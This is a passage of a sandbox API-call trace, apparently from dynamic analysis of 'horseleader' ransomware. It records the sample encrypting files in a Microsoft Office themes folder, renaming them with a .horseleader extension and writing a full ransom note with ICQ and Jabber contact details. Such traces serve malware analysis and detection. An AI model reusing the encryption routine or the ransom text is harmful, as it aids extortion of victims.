WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x139be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.082] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.083] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.083] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.084] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.084] CloseHandle (hObject=0x1a4) returned 1 [0246.084] GetProcessHeap () returned 0x780000 [0246.084] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.084] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.horseleader") returned 85 [0246.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm.horseleader")) returned 1 [0246.085] GetProcessHeap () returned 0x780000 [0246.086] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.086] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AXIS.INF", cAlternateFileName="")) returned 1 [0246.086] lstrcmpiW (lpString1="AXIS.INF", lpString2="Windows") returned -1 [0246.086] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0246.086] StrStrIW (lpFirst="AXIS.INF", lpSrch=".horseleader") returned 0x0 [0246.086] lstrcmpW (lpString1="AXIS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.086] lstrcmpW (lpString1="AXIS.INF", lpString2="_uninstalling_.png") returned 1 [0246.086] lstrlenW (lpString=".testttjffg") returned 11 [0246.086] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF", lpSrch=".testttjffg") returned 0x0 [0246.086] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.086] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0246.088] StrStrW (lpFirst="AXIS.INF", lpSrch=".txt") returned 0x0 [0246.088] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=529) returned 1 [0246.088] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.090] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.090] CloseHandle (hObject=0x1a4) returned 1 [0246.091] GetProcessHeap () returned 0x780000 [0246.091] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.091] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.horseleader") returned 85 [0246.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf.horseleader")) returned 1 [0246.094] GetProcessHeap () returned 0x780000 [0246.094] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.095] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.095] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.095] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0246.095] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.095] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.095] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.095] lstrlenW (lpString=".testttjffg") returned 11 [0246.095] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0246.096] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.096] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2848) returned 1 [0246.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xb20, lpOverlapped=0x0) returned 1 [0246.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff4e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xb20, lpOverlapped=0x0) returned 1 [0246.098] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.098] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.099] CloseHandle (hObject=0x1a4) returned 1 [0246.099] GetProcessHeap () returned 0x780000 [0246.099] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.099] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.horseleader") returned 88 [0246.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.horseleader")) returned 1 [0246.100] GetProcessHeap () returned 0x780000 [0246.100] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.100] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.100] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.100] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0246.100] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.100] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.100] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.100] lstrlenW (lpString=".testttjffg") returned 11 [0246.100] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.101] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.101] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.101] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0246.101] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.101] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34916) returned 1 [0246.101] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.105] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.105] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.105] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3864, lpOverlapped=0x0) returned 1 [0246.105] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc79c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3864, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3864, lpOverlapped=0x0) returned 1 [0246.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.106] CloseHandle (hObject=0x1a4) returned 1 [0246.106] GetProcessHeap () returned 0x780000 [0246.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.107] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.horseleader") returned 89 [0246.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.horseleader")) returned 1 [0246.107] GetProcessHeap () returned 0x780000 [0246.107] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.108] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x8864, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.108] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.108] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\#Decrypt#.txt") returned 78 [0246.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.108] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.108] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.110] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.110] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.110] CloseHandle (hObject=0x158) returned 1 [0246.110] GetProcessHeap () returned 0x780000 [0246.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.110] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0246.110] lstrcmpiW (lpString1="BLENDS", lpString2="Windows") returned -1 [0246.110] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned 66 [0246.110] lstrcmpW (lpString1="BLENDS", lpString2=".") returned 1 [0246.110] lstrcmpW (lpString1="BLENDS", lpString2="..") returned 1 [0246.111] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.111] GetProcessHeap () returned 0x780000 [0246.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.111] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*") returned 68 [0246.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\.") returned 68 [0246.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, 